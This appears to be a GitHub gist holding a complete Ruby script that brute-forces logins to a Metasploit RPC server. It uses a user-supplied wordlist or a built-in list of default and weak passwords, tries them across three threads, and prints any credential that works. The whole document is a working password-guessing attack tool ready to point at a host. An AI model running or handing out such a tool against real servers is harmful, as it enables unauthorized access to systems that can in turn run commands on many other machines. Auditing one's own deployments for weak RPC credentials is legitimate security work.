
@bcoles
Created July 5, 2017 16:27
MSF RPC login brute force
#!/usr/bin/env ruby
#
# MSF RPC login brute force
#
require 'msfrpc-client'
require 'thread'
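# Number of worker threads that attempt logins concurrently.
MAX_THREADS = 3

puts 'MSF RPC login brute force'
puts '---'

# usage: host and port are required; user, ssl and the wordlist are optional
# and fall back to the defaults assigned below.
if ARGV.length < 2
  puts "Usage: ./brute-msfrpcd.rb <host> <port> [user] [ssl] [/path/to/wordlist.txt]"
  exit 1
end

# parse target
@host = ARGV[0] || '127.0.0.1'
@port = ARGV[1] || '55552'
@user = ARGV[2] || 'msf'
# ARGV values are Strings and every String (including "false") is truthy, so
# the flag is compared explicitly; otherwise SSL could never be switched off.
@ssl = ARGV[3].nil? || !%w[false 0 no off].include?(ARGV[3].downcase)

# parse wordlist
file = ARGV[4]
@wordlist = []
if file.nil?
  # Small built-in list of weak passwords; an RPC credential matching any of
  # these is found within the first few attempts.
  @wordlist = ['msf', 'password', '1234', '12345', 'msfchangeme', 'abc123', 'test', 'pass123', 'myPassword', 'msfpassword']
  puts "* No wordlist specified. Using default list (#{@wordlist.length} words)"
else
  # String#chomp! returns nil when there is nothing to strip (for example a
  # final line without a trailing newline), which would push nil into the
  # list. String#chomp always returns a String. File.foreach closes the file
  # itself once the block has seen every line.
  File.foreach(file) do |line|
    @wordlist << line.chomp
  end
  puts "* Using wordlist '#{file}' (#{@wordlist.length} words)"
end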
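# Distribute the wordlist over MAX_THREADS worker threads and stop handing out
# work as soon as `login` reports a success.
#
# Reads @user and @wordlist, which the top-level script sets before calling.
def main
  puts "* Starting MSF RPC login brute force for user '#{@user}'"

  work_queue = Queue.new
  @wordlist.each { |pass| work_queue << pass }

  workers = Array.new(MAX_THREADS) do
    Thread.new do
      loop do
        begin
          # Non-blocking pop: raises ThreadError once the queue is empty,
          # which is the normal way for a worker to finish.
          pass = work_queue.pop(true)
        rescue ThreadError
          break
        end

        # A nil entry is not a candidate; skip it rather than ending the worker.
        next if pass.nil?
        next unless login(pass)

        # Success: drop the remaining candidates so the other workers run dry
        # and return on their own. Killing every entry of Thread.list would
        # also kill the main thread and any thread a library started.
        work_queue.clear
        break
      end
    end
  end

  workers.each(&:join)
end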
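# Attempt a single RPC login for @user with the given password.
#
# Uses @host, @port, @user and @ssl as set by the top-level script. A refused
# connection ends the whole run with exit status 1.
#
# @param pass [String] candidate password
# @return [Boolean] true when the client holds a token afterwards, false when
#   the server answers "Login Failed", reports another error, or no token is set
def login(pass)
  puts "* Trying: #{pass}"
  begin
    rpc = Msf::RPC::Client.new :host => @host,
                               :port => @port,
                               :user => @user,
                               :pass => pass,
                               :ssl => @ssl
  rescue Rex::ConnectionRefused
    puts '- Error: Connection refused'
    exit 1
  rescue Msf::RPC::ServerException => e
    return false if e.message =~ /Login Failed/
    puts "- Error: connection failed: #{e}"
    # No client object exists on this path; falling through would call
    # #token on nil and raise NoMethodError inside the worker thread.
    return false
  end
  return false if rpc.token.nil?
  # The working credential is written to stdout in clear text, so captured
  # output of this script has to be handled as a secret.
  puts "+ Login success: '#{@user}' : '#{pass}'"
  true
ensure
  # Best-effort cleanup: rpc is nil when construction failed, and an error
  # while closing must not hide the method's result.
  begin
    rpc.close if rpc
  rescue StandardError
    nil
  end
end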
# Script entry point: run the brute force with the settings parsed above.
main